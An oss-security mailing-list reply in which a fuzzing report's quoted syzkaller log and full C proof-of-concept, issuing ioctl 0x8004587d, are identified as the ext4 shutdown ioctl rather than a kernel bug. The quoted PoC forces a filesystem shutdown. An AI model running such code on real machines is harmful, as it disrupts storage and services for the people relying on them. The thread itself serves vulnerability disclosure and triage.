[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down
From:       Xiami <pengyu.tao () yooli ! com>
Date:       2018-08-28 9:45:37
Message-ID: 20180828094537.GA10578 () localvm ! private ! f2light ! com+6A304428CF1ACB2B
[Download RAW message or body]

On Tue, Aug 28, 2018 at 08:27:50AM +0000, zhrzhang(� 洪睿) wrote:
> Hello：
> when I fuzz，I found the kernel will always no output from machine, and error \
> FS_IOC_FSSETXATTR contribute to this. 
> the syzlog is as below:
> 
> r0 = creat(&(0x7f0000000140)='./file0\x00', 0x0)
> ioctl$FS_IOC_FSSETXATTR(r0, 0x8004587d, &(0x7f0000000080)={0x0, 0x0, 0x0, 0x8})

Your ioctl command 0x8004587d is exactly EXT4_IOC_SHUTDOWN defined in fs/ext4/ext4.h

> 
> the poc will show like this:
> 
> #define _GNU_SOURCE
> 
> #include <endian.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <unistd.h>
> 
> uint64_t r[1] = {0xffffffffffffffff};
> 
> int main(void)
> {
> syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
> long res = 0;
> memcpy((void*)0x20000140, "./file0", 8);
> res = syscall(__NR_creat, 0x20000140, 0);
> if (res != -1)
> r[0] = res;
> *(uint32_t*)0x20000080 = 0;
> *(uint32_t*)0x20000084 = 0;
> *(uint32_t*)0x20000088 = 0;
> *(uint32_t*)0x2000008c = 8;
> *(uint32_t*)0x20000090 = 0;
> *(uint64_t*)0x20000098 = 0;
> syscall(__NR_ioctl, r[0], 0x8004587d, 0x20000080);
> return 0;
> }
> ________________________________
> zhrzhang(� 洪睿)


[prev in list] [next in list] [prev in thread] [next in thread]